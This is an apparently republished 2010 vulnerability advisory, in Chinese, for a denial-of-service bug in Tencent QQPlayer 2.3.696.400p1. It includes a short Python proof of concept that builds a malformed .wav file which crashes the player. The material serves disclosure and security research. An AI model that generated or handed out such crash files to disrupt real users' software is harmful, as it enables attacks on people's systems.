QQ影音.wav文件解析拒绝服务漏洞
- 发表于
- Vulndb
发布时间:2010-09-07
影响版本:Tencent QQ影音 2.3.696.400p1
漏洞描述:QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。
用户受骗使用QQ影音打开了畸形的.wav文件就会导致播放器崩溃。
<*参考
hadji samir (s-dz@hotmail.fr)
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
#!/usr/bin/python # ########################################################################################### # Exploit Title: QQPlayer 2.3.696.400p1(.wav) Denial of Service Vulnerability # Date: 07-09-2010 # Author: Hadji Samir , s-Dz[at]hotmail[dot]fr # Software Link: www.qq.com # Version: QQPlayer 2.3.696.400p1 # Tested on: Windows XP sp2 # CVE : # Notes: Working with filetype Mahboul-3lik.wav (.mp3,.3gp,.avi...) # Samir tjrs mahboul-3lik ... # ########################################################################################### boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20") buff = ("\x41" * 50000 ) wizz = open("Mahboul-3lik.wav","w") wizz.write(boom + buff ) wizz.close() |
安全建议:
厂商补丁:
Tencent
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://player.qq.com/
原文连接:QQ影音.wav文件解析拒绝服务漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
![[CSDN-luomingui]QQ空间留言C#](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2014/02/12.jpg&h=144&w=208&zc=1)
